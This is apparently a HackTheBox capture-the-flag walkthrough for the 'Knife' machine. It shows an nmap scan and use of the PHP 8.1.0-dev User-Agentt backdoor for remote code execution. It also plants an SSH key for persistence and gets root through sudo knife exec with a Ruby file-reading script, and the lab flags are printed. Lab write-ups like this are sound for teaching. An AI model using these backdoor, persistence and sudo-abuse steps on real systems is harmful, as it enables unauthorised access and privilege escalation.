HackTheBox - Knife

29-08-2021

3 minute read

Summary

Knife
Difficulty:	Easy
OS:	Linux
Release date:	22-05-2021

Knife was an easy and straightforward machine which involved exploiting a backdoor in PHP to gain user access. Root access was achieved by escalating privileges through the Knife command-line tool.

Foothold

An Nmap scan revealed that ports on this machine are 22 and 80, and that there was a webserver running on port 80.

mick@kali:~/Documents/HackTheBox/Knife$ nmap -sV -sC -oN nmap_knife 10.10.10.242
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-13 22:31 CEST
Nmap scan report for 10.10.10.242
Host is up (0.045s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.46 seconds

The web application was a static medical website that did not lead anywhere.

knife_homepage

After looking around and inspecting the network requests upon loading the homepage, I discovered that this web application disclosed the PHP version in the response headers.

knife_network

To be specific, the PHP version being used is 8.1.0-dev. A quick google search revealed that this version contained a backdoor that allowed RCE by sending commands in the ‘User-Agentt’ header. A quick test shows that the exploit works and that the user running the web application is ‘james’.

mick@kali:~/Documents/HackTheBox/Knife$ python3 exploit.py -u http://10.10.10.242 -c "whoami"
[+] Results:
james

To make this a little easier to work with, I decided to append my SSH public key to their authorized_keys file.

mick@kali:~/Documents/HackTheBox/Knife$ 
python3 exploit.py -u http://10.10.10.242 -c "echo ssh-rsa AAAA<snip>008= >> /home/james/.ssh/authorized_keys"

After doing so, I managed to gain foothold and user access.

mick@kali:~/Documents/HackTheBox/Knife$ ssh [email protected]
Enter passphrase for key '/home/mick/.ssh/id_rsa': 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-72-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 13 Jul 2021 09:34:21 PM UTC

  System load:             0.07
  Usage of /:              51.7% of 9.72GB
  Memory usage:            66%
  Swap usage:              0%
  Processes:               356
  Users logged in:         0
  IPv4 address for ens160: 10.10.10.242
  IPv6 address for ens160: dead:beef::250:56ff:feb9:64a3


18 updates can be applied immediately.
13 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Jul 13 17:15:33 2021 from 10.10.16.14
-bash-5.0$ cat user.txt
3f0ff5728469b357dbf8b7eb67e19dca

Root access

After checking which binaries I could run with sudo, I discovered that I had access to knife. Knife is a command-line utility that helps manage Chef environments.

-bash-5.0$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

The most interesting thing about this finding was that knife has an exec command that allows a user to execute ruby scripts. To escalate my priviliges I quickly put together a ruby script called ‘exploit.rb’ with the code below in it. The script reads and prints the content of the root.txt file. Instead of reading this root.txt I could have read root’s private SSH key as well to gain full root access to the machine.

file = File.open("/home/root/root.txt")
file_data = file.read
puts file_data
file.close

Exploiting this provided me with root access.

-bash-5.0$ sudo knife exec exploit.rb
84d80cc163b0cfe0bfe4253aa9c9421a